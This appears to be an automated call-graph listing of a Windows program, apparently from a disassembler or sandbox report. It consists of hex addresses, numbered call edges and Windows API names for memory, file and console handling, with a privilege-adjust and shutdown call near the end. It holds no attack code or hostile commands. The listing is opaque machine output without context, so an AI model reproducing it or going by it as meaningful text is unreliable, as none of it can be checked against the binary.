139 API calls 35878->35918 35919 438498 139 API calls 35878->35919 35879->35699 35880->35700 35882 4385b0 35881->35882 35920 404a30 35882->35920 35884 4386f2 35925 4387f8 35884->35925 35886 438df8 139 API calls 35888 43865c 35886->35888 35888->35884 35888->35886 35891 438683 35888->35891 35890 438694 35890->35878 35981 4029a4 VirtualFree VirtualFree 35891->35981 35894 439755 35893->35894 35895 43967a 35893->35895 35894->35863 36099 43978c VirtualFree VirtualFree 35895->36099 35898 438e0a 35897->35898 35899 438e0f 35897->35899 35898->35867 36100 42b1cc 35899->36100 35902->35878 35914 438e9b 35903->35914 35904 439214 35905 4392bc 86 API calls 35904->35905 35906 4391db 35905->35906 35906->35878 35908 407550 82 API calls 35908->35914 35909 439264 82 API calls 35909->35914 35910 4029a4 VirtualFree VirtualFree 35910->35914 35912 439238 VirtualFree VirtualFree 35912->35914 35913 407564 VirtualFree VirtualFree 35913->35914 35914->35904 35914->35906 35914->35908 35914->35909 35914->35910 35914->35912 35914->35913 35915 43a548 VirtualFree VirtualFree 35914->35915 36117 42b3b4 35914->36117 36128 4392bc 35914->36128 35915->35914 35916->35865 35917->35878 35918->35878 35919->35878 35983 43acd0 35920->35983 35923 404a52 35923->35888 36062 415adc 35925->36062 35927 438814 36065 415bb0 35927->36065 35929 438865 35931 43888b 35929->35931 35932 4388a1 35929->35932 35930 438847 35930->35929 36069 43978c VirtualFree VirtualFree 35930->36069 36070 415af4 VirtualFree VirtualFree 35931->36070 36071 43a57c 35932->36071 35935 438702 35982 4029a4 VirtualFree VirtualFree 35935->35982 35937 438904 36076 415af4 VirtualFree VirtualFree 35937->36076 35938 43891a 36077 438da0 82 API calls 35938->36077 35941 4388c3 35941->35937 35941->35938 35943 438990 35941->35943 35942 43892a 35944 43a57c 24 API calls 35942->35944 35949 438a0d 35943->35949 36079 438da0 82 API calls 35943->36079 35947 438931 35944->35947 36078 4013e8 82 API calls 35947->36078 35948 438be8 35953 438c16 35948->35953 36085 4075c0 35948->36085 35949->35948 35952 438b42 35949->35952 35955 438b58 35949->35955 36080 415af4 VirtualFree VirtualFree 35952->36080 35969 438c43 35953->35969 36089 407564 VirtualFree VirtualFree 35953->36089 35954 438c36 35957 4075c0 82 API calls 35954->35957 35958 404a30 86 API calls 35955->35958 35957->35969 35960 438b63 35958->35960 35959 438bc3 36083 41690c 82 API calls 35959->36083 35960->35959 35961 438b7c 35960->35961 36081 4029a4 VirtualFree VirtualFree 35961->36081 35964 438bdb 36084 4029a4 VirtualFree VirtualFree 35964->36084 35965 438b8c 36082 415af4 VirtualFree VirtualFree 35965->36082 35968 438d75 36093 415af4 VirtualFree VirtualFree 35968->36093 35969->35968 35971 438ce5 35969->35971 35972 438ccf 35969->35972 35974 438cf7 35971->35974 35975 438d0a 35971->35975 36090 415af4 VirtualFree VirtualFree 35972->36090 36091 415af4 VirtualFree VirtualFree 35974->36091 35977 4075c0 82 API calls 35975->35977 35979 438d21 35975->35979 35977->35979 35978 438d42 36092 415af4 VirtualFree VirtualFree 35978->36092 35979->35968 35979->35978 35981->35890 35982->35890 35989 43b51a 35983->35989 35994 43b50c 35983->35994 35998 43ad68 35983->35998 35984 404a3c 35984->35923 35988 433950 82 API calls 35984->35988 35988->35923 36003 43b4d0 35989->36003 35995 43b521 35994->35995 35997 43b516 35994->35997 35996 43b52c 5 API calls 35995->35996 35996->35997 35997->35984 35999 43ad72 35998->35999 36001 43b51a 6 API calls 35999->36001 36002 43b50c 5 API calls 35999->36002 36000 43ad7d 36000->35984 36001->36000 36002->36000 36014 43ab88 VirtualAlloc 36003->36014 36005 43b4f3 36006 43b52c 36005->36006 36008 43b53f 36006->36008 36012 43b527 36006->36012 36007 43b561 36010 43aff0 5 API calls 36007->36010 36007->36012 36008->36007 36015 43aff0 36008->36015 36011 43b6ee 36010->36011 36011->36012 36013 43b52c 5 API calls 36011->36013 36012->35984 36013->36012 36014->36005 36016 43b016 36015->36016 36019 43b01b 36015->36019 36044 43b704 GlobalMemoryStatus 36016->36044 36018 43b156 36045 43ab1c 36018->36045 36019->36018 36021 43b059 36019->36021 36049 43abb0 36021->36049 36024 43b277 36028 43abb0 2 API calls 36024->36028 36026 43b0f0 36055 43af04 VirtualFree VirtualFree 36026->36055 36027 43b10b 36030 43abb0 2 API calls 36027->36030 36032 43b281 36028->36032 36033 43b119 36030->36033 36031 43b1ef 36036 43abb0 2 API calls 36031->36036 36043 43b218 36031->36043 36034 43b101 36032->36034 36059 43ac14 VirtualFree 36032->36059 36033->36034 36056 43af04 VirtualFree VirtualFree 36033->36056 36034->36007 36040 43b204 36036->36040 36038 43abb0 2 API calls 36039 43b231 36038->36039 36039->36034 36058 43af04 VirtualFree VirtualFree 36039->36058 36040->36034 36057 43af04 VirtualFree VirtualFree 36040->36057 36043->36038 36044->36019 36046 43ab52 VirtualAlloc 36045->36046 36047 43ab2c 36045->36047 36048 43ab77 36046->36048 36047->36046 36048->36024 36048->36031 36048->36034 36050 43abde 36049->36050 36051 43abbd VirtualAlloc 36049->36051 36050->36026 36050->36027 36052 43abd3 36051->36052 36053 43abe2 36051->36053 36060 43abfc VirtualFree 36052->36060 36053->36050 36053->36051 36055->36034 36056->36034 36057->36043 36058->36034 36059->36034 36061 43ac0b 36060->36061 36061->36050 36094 43a71c 36062->36094 36066 415bb9 36065->36066 36068 415bc3 36065->36068 36067 43a71c 24 API calls 36066->36067 36067->36068 36068->35930 36069->35929 36070->35935 36073 43a595 36071->36073 36072 43acd0 6 API calls 36072->36073 36073->36072 36074 43a5f7 36073->36074 36097 4422cb 24 API calls 36073->36097 36074->35941 36076->35935 36077->35942 36078->35943 36079->35949 36080->35935 36081->35965 36082->35935 36083->35964 36084->35948 36086 40760a 36085->36086 36087 4075cf 36085->36087 36086->35953 36087->36086 36098 433950 82 API calls 36087->36098 36089->35954 36090->35935 36091->35935 36092->35935 36093->35935 36095 43a57c 24 API calls 36094->36095 36096 415ae9 36095->36096 36096->35927 36097->36073 36098->36086 36099->35894 36101 42b2e3 36100->36101 36109 42b1f1 36100->36109 36108 42b317 36101->36108 36111 42b518 36101->36111 36104 42b3ab 36105 42b23a 36104->36105 36105->35867 36106 403838 82 API calls 36106->36109 36107 42b343 36116 40c2d4 Sleep 36107->36116 36108->36107 36109->36101 36109->36105 36109->36106 36115 42f4c4 139 API calls 36109->36115 36112 42b52a 36111->36112 36114 42b5a3 36111->36114 36113 42bb7c 82 API calls 36112->36113 36112->36114 36113->36114 36114->36108 36115->36109 36116->36104 36118 42b3cc 36117->36118 36120 42b3df 36117->36120 36138 407550 82 API calls 36118->36138 36121 403674 82 API calls 36120->36121 36123 42b405 36120->36123 36121->36123 36122 42b49b 36140 40c2d4 Sleep 36122->36140 36123->36122 36124 42b463 36123->36124 36124->36123 36139 426c18 85 API calls 36124->36139 36127 42b4a7 36127->35914 36129 4392c6 36128->36129 36130 4392d1 36129->36130 36131 439305 36129->36131 36141 439320 36130->36141 36133 439320 86 API calls 36131->36133 36135 43931a 36133->36135 36135->35914 36136 439320 86 API calls 36137 4392fb 36136->36137 36137->35914 36138->36120 36139->36122 36140->36127 36142 439340 36141->36142 36143 42b3b4 86 API calls 36142->36143 36144 4392ec 36142->36144 36143->36144 36144->36136 37481 431600 16 API calls 37482 43c600 20 API calls 37547 40d504 VirtualFree VirtualFree 37548 43a906 27 API calls 36275 440f0c 36278 440eb8 36275->36278 36279 440ec3 36278->36279 36281 440f05 36279->36281 36282 441a44 ExitProcess 36279->36282 37550 404d08 89 API calls 37551 42cd0b LCMapStringA 37554 42dcf1 CompareStringA CompareStringA CharUpperA CharUpperA 37555 4426e1 VirtualFree VirtualFree RaiseException 36568 437a14 36569 437a22 36568->36569 36587 437aa7 36568->36587 36570 437a3b 36569->36570 36600 43a558 36569->36600 36588 43978c VirtualFree VirtualFree 36570->36588 36573 437a43 36589 4011ec VirtualFree VirtualFree 36573->36589 36575 437a53 36590 437aac VirtualFree VirtualFree 36575->36590 36577 437a63 36591 437aac VirtualFree VirtualFree 36577->36591 36579 437a73 36592 415b80 36579->36592 36583 437a90 36604 415af4 VirtualFree VirtualFree 36583->36604 36585 437a99 36585->36587 36605 43a548 36585->36605 36588->36573 36589->36575 36590->36577 36591->36579 36593 415b8a 36592->36593 36599 415baa 36592->36599 36594 43a558 2 API calls 36593->36594 36595 415b92 36594->36595 36608 415af4 VirtualFree VirtualFree 36595->36608 36597 415b9c 36598 43a548 2 API calls 36597->36598 36597->36599 36598->36599 36603 433f60 VirtualFree VirtualFree 36599->36603 36601 43a548 2 API calls 36600->36601 36602 43a564 36601->36602 36602->36570 36603->36583 36604->36585 36609 43ace0 36605->36609 36608->36597 36613 43b3b4 36609->36613 36618 43b3a8 36609->36618 36610 43a554 36610->36587 36614 43b3bc 36613->36614 36626 43ac14 VirtualFree 36613->36626 36622 43b3c8 36614->36622 36619 43b3b2 36618->36619 36620 43b3bc 36618->36620 36619->36610 36621 43b3c8 2 API calls 36620->36621 36621->36619 36623 43b3c2 36622->36623 36624 43b3d7 36622->36624 36623->36610 36624->36623 36627 43b2b4 36624->36627 36626->36614 36628 43b2d5 36627->36628 36634 43b2ec 36628->36634 36636 43af04 VirtualFree VirtualFree 36628->36636 36630 43b370 36632 43abfc VirtualFree 36630->36632 36631 43abfc VirtualFree 36633 43b320 36631->36633 36632->36634 36633->36630 36633->36631 36637 43ac14 VirtualFree 36633->36637 36634->36623 36636->36633 36637->36633 37486 43c019 20 API calls 37489 441020 22 API calls 37560 441d20 GetStartupInfoA 37562 401127 GetProcessHeap HeapFree TlsFree TlsGetValue 37563 43b929 VirtualFree 37491 43c628 GetModuleHandleA GetProcAddress 37492 43ac30 17 API calls 37564 42c736 83 API calls 37565 441730 23 API calls 37567 440f3c ExitProcess 37571 440bcc GetModuleHandleA GetProcAddress GetVersionExA 37495 4246c8 202 API calls 37496 401079 GetProcessHeap HeapAlloc TlsAlloc TlsSetValue 37498 43e2d4 MultiByteToWideChar MultiByteToWideChar 36649 409edc 36650 403cbc GetFileType 36649->36650 36651 409ef8 36650->36651 36652 409efc 36651->36652 36653 409f1e 36651->36653 36654 40efd8 3 API calls 36652->36654 36655 403838 82 API calls 36653->36655 36656 409f0a 36654->36656 36657 409f30 36655->36657 36797 42bafc 82 API calls 36656->36797 36659 409f74 36657->36659 36660 409f55 36657->36660 36687 409f14 36657->36687 36798 403e58 86 API calls 36659->36798 36661 409f6f 36660->36661 36663 4039b0 82 API calls 36660->36663 36703 40a5c4 36661->36703 36663->36661 36665 409f81 36667 403a68 82 API calls 36665->36667 36669 409f88 36667->36669 36668 40a3f0 82 API calls 36670 40a091 36668->36670 36671 403838 82 API calls 36669->36671 36672 40a09a 36670->36672 36674 40efd8 3 API calls 36670->36674 36686 409f9b 36671->36686 36677 40a184 36672->36677 36683 40a1ee 36672->36683 36672->36687 36673 40a04c 36675 40a060 36673->36675 36676 40a076 36673->36676 36678 40a0d7 36674->36678 36799 401244 VirtualFree VirtualFree 36675->36799 36800 401244 VirtualFree VirtualFree 36676->36800 36684 40efd8 3 API calls 36677->36684 36801 42bafc 82 API calls 36678->36801 36682 40a0e1 36802 42bbec SetFilePointer WriteFile GetLastError 36682->36802 36683->36687 36688 403104 82 API calls 36683->36688 36689 40a1a1 36684->36689 36686->36673 36690 4039b0 82 API calls 36686->36690 36701 40a22f 36688->36701 36803 42bafc 82 API calls 36689->36803 36692 40a031 36690->36692 36692->36673 36697 403838 82 API calls 36692->36697 36693 40a1ab 36695 40efd8 3 API calls 36693->36695 36694 40a5c4 101 API calls 36694->36701 36696 40a1da 36695->36696 36804 42bafc 82 API calls 36696->36804 36697->36673 36698 40a2b5 36805 403128 82 API calls 36698->36805 36701->36694 36701->36698 36702 40a3f0 82 API calls 36701->36702 36702->36701 36704 403a68 82 API calls 36703->36704 36705 40a5e0 36704->36705 36706 40a5f5 36705->36706 36709 40a601 36705->36709 36816 40b414 86 API calls 36706->36816 36708 40a08a 36708->36668 36710 40a6e7 36709->36710 36711 403838 82 API calls 36709->36711 36806 40e8cc 36710->36806 36713 40a656 36711->36713 36715 40a671 36713->36715 36716 40a65b 36713->36716 36714 40a6fd 36717 40a703 36714->36717 36729 40a780 36714->36729 36720 40a6b8 36715->36720 36818 42bcb0 92 API calls 36715->36818 36817 4029a4 VirtualFree VirtualFree 36716->36817 36719 403c78 82 API calls 36717->36719 36724 40a70a 36719->36724 36820 40cd40 MultiByteToWideChar CharToOemBuffA 36720->36820 36723 40a69e 36723->36720 36725 403514 82 API calls 36723->36725 36726 40efd8 3 API calls 36724->36726 36727 40a758 36724->36727 36728 40a6a9 36725->36728 36730 40a74e 36726->36730 36822 4029a4 VirtualFree VirtualFree 36727->36822 36819 433c90 82 API calls 36728->36819 36734 40a812 36729->36734 36735 40a7ca 36729->36735 36821 42bafc 82 API calls 36730->36821 36736 40a82a 36734->36736 36737 40a81b 36734->36737 36738 40efd8 3 API calls 36735->36738 36740 40a84b 36736->36740 36742 40a83c 36736->36742 36739 40e8cc 82 API calls 36737->36739 36741 40a7d9 36738->36741 36776 40a828 36739->36776 36743 40e8cc 82 API calls 36740->36743 36823 42bafc 82 API calls 36741->36823 36745 40e8cc 82 API calls 36742->36745 36743->36776 36745->36776 36746 40a7e3 36824 4029a4 VirtualFree VirtualFree 36746->36824 36748 40b395 36749 40b3b1 36748->36749 36750 40b3fa 36748->36750 36752 40efd8 3 API calls 36749->36752 36840 4029a4 VirtualFree VirtualFree 36750->36840 36751 40b346 36751->36748 36754 40b34a 36751->36754 36757 40b3c4 36752->36757 36758 40efd8 3 API calls 36754->36758 36755 40a8ba 36755->36748 36755->36751 36756 403104 82 API calls 36755->36756 36760 40b2fb 36756->36760 36838 42bafc 82 API calls 36757->36838 36759 40b358 36758->36759 36836 42bafc 82 API calls 36759->36836 36763 403a68 82 API calls 36760->36763 36766 40b302 36763->36766 36764 40b3ce 36839 4029a4 VirtualFree VirtualFree 36764->36839 36765 40b362 36767 403514 82 API calls 36765->36767 36768 4039b0 82 API calls 36766->36768 36769 40b36c 36767->36769 36773 40b31f 36768->36773 36837 4029a4 VirtualFree VirtualFree 36769->36837 36774 40b336 36773->36774 36834 403b04 82 API calls 36773->36834 36835 403128 82 API calls 36774->36835 36776->36755 36777 40aadc 36776->36777 36783 40ab75 36776->36783 36785 40ab0e 36777->36785 36825 407550 82 API calls 36777->36825 36780 40ac31 36829 40b6f4 7 API calls 36780->36829 36783->36785 36790 40abdd 36783->36790 36826 40bb5c WideCharToMultiByte 36783->36826 36787 40adb6 36785->36787 36830 40a370 SystemTimeToFileTime LocalFileTimeToFileTime 36785->36830 36786 40abd2 36827 401734 CharToOemA 36786->36827 36787->36755 36831 401724 OemToCharA 36787->36831 36828 40b698 CharToOemA OemToCharA CharLowerA CharUpperA 36790->36828 36791 40ae39 36792 40efd8 3 API calls 36791->36792 36793 40ae44 36792->36793 36832 42bafc 82 API calls 36793->36832 36795 40ae4e 36833 42bbec SetFilePointer WriteFile GetLastError 36795->36833 36797->36687 36798->36665 36799->36687 36800->36661 36801->36682 36802->36672 36803->36693 36804->36687 36805->36687 36807 40e93f 36806->36807 36808 40e8df 36806->36808 36810 4075c0 82 API calls 36807->36810 36815 40e917 36807->36815 36809 4075c0 82 API calls 36808->36809 36808->36815 36811 40e908 36809->36811 36812 40e94c 36810->36812 36814 403838 82 API calls 36811->36814 36813 403838 82 API calls 36812->36813 36813->36815 36814->36815 36815->36714 36816->36708 36817->36708 36818->36723 36819->36720 36820->36710 36821->36727 36822->36708 36823->36746 36824->36708 36825->36785 36826->36786 36827->36790 36828->36780 36829->36785 36830->36787 36831->36791 36832->36795 36833->36755 36834->36773 36835->36751 36836->36765 36837->36708 36838->36764 36839->36708 36840->36708 36841 4313dc 36842 431360 36841->36842 36867 4313d9 36841->36867 36843 40a5c4 101 API calls 36842->36843 36844 431384 36842->36844 36843->36842 36845 43138a 36844->36845 36846 4313de 36844->36846 36868 4029a4 VirtualFree VirtualFree 36845->36868 36848 4313f7 36846->36848 36873 412270 139 API calls 36846->36873 36874 4029a4 VirtualFree VirtualFree 36848->36874 36849 4313a0 36869 4029a4 VirtualFree VirtualFree 36849->36869 36853 43140a 36875 4029a4 VirtualFree VirtualFree 36853->36875 36854 4313b0 36870 42e600 VirtualFree VirtualFree 36854->36870 36857 43141a 36876 42e600 VirtualFree VirtualFree 36857->36876 36858 4313c0 36871 4029a4 VirtualFree VirtualFree 36858->36871 36860 43142a 36877 4029a4 VirtualFree VirtualFree 36860->36877 36863 4313d0 36872 4031f0 82 API calls 36863->36872 36864 43143a 36878 4031f0 82 API calls 36864->36878 36868->36849 36869->36854 36870->36858 36871->36863 36872->36867 36873->36848 36874->36853 36875->36857 36876->36860 36877->36864 36878->36867 37579 4407e4 19 API calls 37499 43e0e0 GetStringTypeW 37580 4235e1 202 API calls 37582 43c5e4 17 API calls 37500 40f2eb 7 API calls 36291 4317f2 36293 4317fe 36291->36293 36292 4039b0 82 API calls 36295 431949 36292->36295 36308 4318f6 36293->36308 36523 40277c 107 API calls 36293->36523 36303 40efd8 3 API calls 36295->36303 36313 431997 36295->36313 36296 431853 36524 401764 CompareStringA 36296->36524 36297 431879 36298 4319fc 36298->36297 36329 431af1 36298->36329 36535 40bb5c WideCharToMultiByte 36298->36535 36299 431a12 36299->36298 36310 40efd8 3 API calls 36299->36310 36300 4319e1 36530 42bcb0 92 API calls 36300->36530 36306 43198d 36303->36306 36304 431864 36307 431875 36304->36307 36311 404404 3 API calls 36304->36311 36529 42bafc 82 API calls 36306->36529 36307->36297 36307->36308 36525 413610 82 API calls 36307->36525 36308->36292 36314 431a53 36310->36314 36311->36307 36313->36297 36313->36298 36313->36299 36313->36300 36531 42bbb8 82 API calls 36314->36531 36315 4318aa 36526 413e64 130 API calls 36315->36526 36318 431a59 36320 431a65 36318->36320 36323 40efd8 3 API calls 36318->36323 36319 4318c3 36321 4318c7 36319->36321 36322 4318e6 36319->36322 36325 431a82 36320->36325 36533 433c90 82 API calls 36320->36533 36527 413644 VirtualFree VirtualFree 36321->36527 36528 413644 VirtualFree VirtualFree 36322->36528 36324 431a76 36323->36324 36532 42be18 82 API calls 36324->36532 36325->36298 36534 42bcb0 92 API calls 36325->36534 36333 431bae 36329->36333 36536 401788 CompareStringA 36329->36536 36518 401840 36333->36518 36335 431cd0 36339 431ce4 36335->36339 36538 40bb80 MultiByteToWideChar 36335->36538 36336 431c5b 36336->36335 36537 40bb80 MultiByteToWideChar 36336->36537 36342 431d20 36339->36342 36539 40bb80 MultiByteToWideChar 36339->36539 36341 402fe8 MultiByteToWideChar 36346 431d9f 36341->36346 36342->36341 36342->36346 36343 431ef0 36344 40efd8 3 API calls 36343->36344 36353 431f92 36343->36353 36345 431f4f 36344->36345 36542 42bafc 82 API calls 36345->36542 36346->36343 36349 40f858 15 API calls 36346->36349 36348 431f59 36350 40efd8 3 API calls 36348->36350 36351 431ec1 36349->36351 36352 431f88 36350->36352 36540 4157f0 SystemTimeToFileTime LocalFileTimeToFileTime 36351->36540 36543 42bafc 82 API calls 36352->36543 36357 4323fb 36353->36357 36359 431fd5 36353->36359 36370 43227c 36353->36370 36356 431ed6 36356->36343 36541 415764 SystemTimeToFileTime LocalFileTimeToFileTime 36356->36541 36358 432492 36357->36358 36366 403cbc GetFileType 36357->36366 36517 432a2b 36357->36517 36362 4324b2 36358->36362 36369 4324ce 36358->36369 36385 4324c9 36358->36385 36361 431ff8 36359->36361 36372 432011 36359->36372 36544 4031f0 82 API calls 36361->36544 36364 40efd8 3 API calls 36362->36364 36371 4324c3 36364->36371 36368 43245d 36366->36368 36367 42bb7c 82 API calls 36373 432559 36367->36373 36368->36358 36381 40efd8 3 API calls 36368->36381 36374 4324ed 36369->36374 36382 432510 36369->36382 36383 4324e8 36369->36383 36370->36357 36384 404e98 87 API calls 36370->36384 36375 42bb7c 82 API calls 36371->36375 36376 432017 36372->36376 36377 43204a 36372->36377 36397 42b678 2 API calls 36373->36397 36378 40efd8 3 API calls 36374->36378 36374->36385 36375->36385 36386 40efd8 3 API calls 36376->36386 36379 4320a4 36377->36379 36380 432059 36377->36380 36389 43253d 36378->36389 36388 403ef8 6 API calls 36379->36388 36391 40efd8 3 API calls 36380->36391 36387 432472 36381->36387 36393 40efd8 3 API calls 36382->36393 36383->36374 36390 4324f4 36383->36390 36392 432310 36384->36392 36385->36367 36385->36373 36394 432028 36386->36394 36555 42bafc 82 API calls 36387->36555 36400 4320b8 36388->36400 36396 42bb7c 82 API calls 36389->36396 36401 40efd8 3 API calls 36390->36401 36398 43206a 36391->36398 36392->36357 36551 433b7c 84 API calls 36392->36551 36402 432521 36393->36402 36395 42bb7c 82 API calls 36394->36395 36403 43202e 36395->36403 36396->36385 36440 4325e5 36397->36440 36406 42bb7c 82 API calls 36398->36406 36405 432148 36400->36405 36414 404404 3 API calls 36400->36414 36407 432505 36401->36407 36408 42bb7c 82 API calls 36402->36408 36545 4031f0 82 API calls 36403->36545 36404 43247c 36556 433a20 82 API calls 36404->36556 36410 432187 36405->36410 36411 43214c 36405->36411 36412 432070 36406->36412 36415 42bb7c 82 API calls 36407->36415 36408->36385 36420 4321aa 36410->36420 36421 43218d 36410->36421 36417 40efd8 3 API calls 36411->36417 36419 40efd8 3 API calls 36412->36419 36418 4320d2 36414->36418 36415->36385 36422 43215d 36417->36422 36426 432120 36418->36426 36429 4046f4 3 API calls 36418->36429 36423 43207d 36419->36423 36425 40efd8 3 API calls 36420->36425 36424 404720 3 API calls 36421->36424 36428 42bb7c 82 API calls 36422->36428 36430 42bb7c 82 API calls 36423->36430 36447 43217b 36424->36447 36427 4321bb 36425->36427 36431 403f58 82 API calls 36426->36431 36547 42bafc 82 API calls 36427->36547 36434 432163 36428->36434 36451 4320e9 36429->36451 36435 432088 36430->36435 36432 432134 36431->36432 36437 403ef8 6 API calls 36432->36437 36433 432339 36433->36357 36448 40efd8 3 API calls 36433->36448 36439 40efd8 3 API calls 36434->36439 36546 4031f0 82 API calls 36435->36546 36437->36405 36438 4321c5 36548 433e00 82 API calls 36438->36548 36444 432170 36439->36444 36442 4326a0 36440->36442 36450 432675 36440->36450 36454 403c78 82 API calls 36440->36454 36441 43225e 36550 4031f0 82 API calls 36441->36550 36462 4326ea 36442->36462 36557 426c18 85 API calls 36442->36557 36449 42bb7c 82 API calls 36444->36449 36447->36441 36456 40c794 GetVersionExA 36447->36456 36464 432215 36447->36464 36453 432365 36448->36453 36449->36447 36450->36442 36455 403ad0 83 API calls 36450->36455 36451->36426 36457 404e98 87 API calls 36451->36457 36552 42bafc 82 API calls 36453->36552 36454->36450 36455->36442 36459 432201 36456->36459 36457->36426 36461 432205 36459->36461 36459->36464 36460 432739 36465 432812 36460->36465 36468 40a3f0 82 API calls 36460->36468 36549 404b5c CreateFileW DeviceIoControl CloseHandle MultiByteToWideChar 36461->36549 36462->36460 36466 432776 36462->36466 36467 43275d 36462->36467 36469 404128 11 API calls 36464->36469 36470 432902 36465->36470 36471 432820 36465->36471 36474 4327b0 36466->36474 36475 4327dd 36466->36475 36558 432a90 139 API calls 36467->36558 36468->36465 36469->36441 36477 42bb7c 82 API calls 36470->36477 36478 432851 36471->36478 36480 43289d 36471->36480 36472 43236f 36479 403f58 82 API calls 36472->36479 36484 437b2c 139 API calls 36474->36484 36475->36460 36476 437b2c 139 API calls 36475->36476 36476->36460 36504 432898 36477->36504 36489 40efd8 3 API calls 36478->36489 36478->36504 36481 4323a4 36479->36481 36482 4328cb 36480->36482 36483 4328ac 36480->36483 36485 404e98 87 API calls 36481->36485 36487 40efd8 3 API calls 36482->36487 36486 40efd8 3 API calls 36483->36486 36484->36460 36488 4323d5 36485->36488 36490 4328bd 36486->36490 36491 4328dc 36487->36491 36492 432404 36488->36492 36493 4323d9 36488->36493 36494 432877 36489->36494 36559 42bafc 82 API calls 36490->36559 36560 42bafc 82 API calls 36491->36560 36492->36357 36554 433b7c 84 API calls 36492->36554 36497 40efd8 3 API calls 36493->36497 36501 42bb7c 82 API calls 36494->36501 36499 4323f1 36497->36499 36553 42bafc 82 API calls 36499->36553 36501->36504 36502 4328c6 36561 42bbec SetFilePointer WriteFile GetLastError 36502->36561 36506 432976 36504->36506 36504->36517 36562 403b38 SetEndOfFile 36504->36562 36507 403c50 3 API calls 36506->36507 36508 4329bb 36507->36508 36509 403514 82 API calls 36508->36509 36510 4329c6 36509->36510 36511 40c794 GetVersionExA 36510->36511 36513 4329f4 36510->36513 36512 4329dd 36511->36512 36512->36513 36514 4329e1 36512->36514 36516 403c60 3 API calls 36513->36516 36563 404b5c CreateFileW DeviceIoControl CloseHandle MultiByteToWideChar 36514->36563 36516->36517 36564 4031f0 82 API calls 36517->36564 36519 401851 36518->36519 36520 401849 36518->36520 36565 43e280 LCMapStringA 36519->36565 36520->36336 36522 401859 36522->36336 36523->36296 36524->36304 36525->36315 36526->36319 36527->36297 36528->36308 36529->36313 36530->36298 36531->36318 36532->36320 36533->36325 36534->36298 36535->36329 36536->36333 36537->36335 36538->36339 36539->36342 36540->36356 36541->36343 36542->36348 36543->36353 36544->36297 36545->36297 36546->36297 36547->36438 36548->36447 36549->36464 36550->36297 36551->36433 36552->36472 36553->36357 36554->36357 36555->36404 36556->36358 36557->36462 36558->36460 36559->36502 36560->36502 36561->36504 36562->36506 36563->36513 36564->36297 36565->36522 37503 43d4f0 VirtualFree VirtualFree SetFilePointer WriteFile GetLastError 37504 4010f4 GetProcessHeap HeapFree TlsGetValue 36638 43cef4 SetHandleCount 36639 43cf15 GetStartupInfoA 36638->36639 36640 43cf0f 36638->36640 36644 43cf40 36639->36644 36640->36639 36641 43cfe1 GetStdHandle GetStdHandle GetStdHandle 36645 43d00c 36641->36645 36642 43d046 36644->36641 36644->36642 36645->36642 36646 43c968 36645->36646 36647 43c977 36646->36647 36648 43c97c GetFileType 36646->36648 36647->36645 36648->36645 37585 43cbf8 SetFilePointer WriteFile GetLastError 37586 43e5f8 WideCharToMultiByte GetLastError WideCharToMultiByte WideCharToMultiByte 37587 42c9fe 84 API calls 37506 41b4fc ExitThread 37507 431481 154 API calls 36145 431360 139 API calls 37590 43c780 22 API calls 37592 409587 193 API calls 37508 40a488 82 API calls 37594 40fd8a 90 API calls 36566 431792 152 API calls 37509 43e490 MultiByteToWideChar GetLastError MultiByteToWideChar MultiByteToWideChar 37596 423794 197 API calls 37510 43d094 GetLastError 37597 441d9c GetTickCount 37511 42c898 CompareStringA CompareStringA LCMapStringA 37600 43c998 GetFileType 37603 440ba4 15 API calls 37604 43d654 WideCharToMultiByte 36224 4310a4 36255 4015f0 CompareStringA WideCharToMultiByte CompareStringW GetVersionExA 36224->36255 36226 431109 36227 43110d 36226->36227 36233 43115f 36226->36233 36262 4029a4 VirtualFree VirtualFree 36227->36262 36228 43121d 36256 430e60 36228->36256 36230 431120 36263 4029a4 VirtualFree VirtualFree 36230->36263 36233->36228 36250 40f858 15 API calls 36233->36250 36267 402248 CompareStringA MultiByteToWideChar 36233->36267 36234 431130 36264 42e600 VirtualFree VirtualFree 36234->36264 36237 431140 36265 4029a4 VirtualFree VirtualFree 36237->36265 36241 431150 36266 4031f0 82 API calls 36241->36266 36242 4312a5 36269 4029a4 VirtualFree VirtualFree 36242->36269 36244 431159 36246 4312be 36270 4029a4 VirtualFree VirtualFree 36246->36270 36248 4312ce 36271 42e600 VirtualFree VirtualFree 36248->36271 36250->36233 36251 4312de 36272 4029a4 VirtualFree VirtualFree 36251->36272 36253 4312ee 36273 4031f0 82 API calls 36253->36273 36255->36226 36257 403c78 82 API calls 36256->36257 36258 430e70 36257->36258 36259 430e9c 36258->36259 36274 415a6c FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime GetSystemTime SystemTimeToFileTime 36259->36274 36261 430eef 36268 407784 140 API calls 36261->36268 36262->36230 36263->36234 36264->36237 36265->36241 36266->36244 36267->36233 36268->36242 36269->36246 36270->36248 36271->36251 36272->36253 36273->36244 36274->36261 37610 43c5b0 16 API calls 37515 435ab5 139 API calls 37612 42b5b8 GetStdHandle ReadFile GetLastError GetFileType 36879 43a3bc 36880 43a3c5 36879->36880 36880->36880 36913 433da8 36880->36913 36882 43a3ed 36883 43a3f2 SetErrorMode GetModuleHandleA 36882->36883 36916 40ef24 36883->36916 36894 43a464 36896 43a482 36894->36896 37083 42c260 92 API calls 36894->37083 36957 42c590 36896->36957 36901 43a48d 36963 42da8c 36901->36963 36907 43a500 37085 403d48 82 API calls 36907->37085 36909 43a505 36910 43a509 36909->36910 36911 43a50e 36909->36911 37086 40c734 GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges ExitWindowsEx 36910->37086 36914 433db1 SetConsoleCtrlHandler 36913->36914 36914->36882 37087 40efb4 36916->37087 36919 40ef53 GetModuleFileNameA 36920 40ef41 36919->36920 36921 40ef7c LoadLibraryA 36920->36921 36922 40ef9f 36921->36922 36923 42e764 36922->36923 37090 42e76c 36923->37090 36926 439bf0 36929 439bf9 36926->36929 36932 40f6fc 3 API calls 36929->36932 36933 439ca6 36929->36933 36935 439cb9 36929->36935 37137 402114 36929->37137 37145 40f72c MultiByteToWideChar 36929->37145 37146 439b38 92 API calls 36929->37146 37153 40f798 36929->37153 36932->36929 37147 40f6fc 36933->37147 36936 42c078 36935->36936 37181 42e5d0 36936->37181 36941 42c648 36942 42c6ef 36941->36942 36945 42c66a 36941->36945 36942->36894 36947 42c6fc 36942->36947 36944 401788 CompareStringA 36944->36945 36945->36942 36945->36944 36946 42c804 82 API calls 36945->36946 37268 401764 CompareStringA 36945->37268 36946->36945 36948 401150 2 API calls 36947->36948 36949 42c714 36948->36949 37269 40fcd0 36949->37269 36951 42c730 36952 42c778 36951->36952 37310 401788 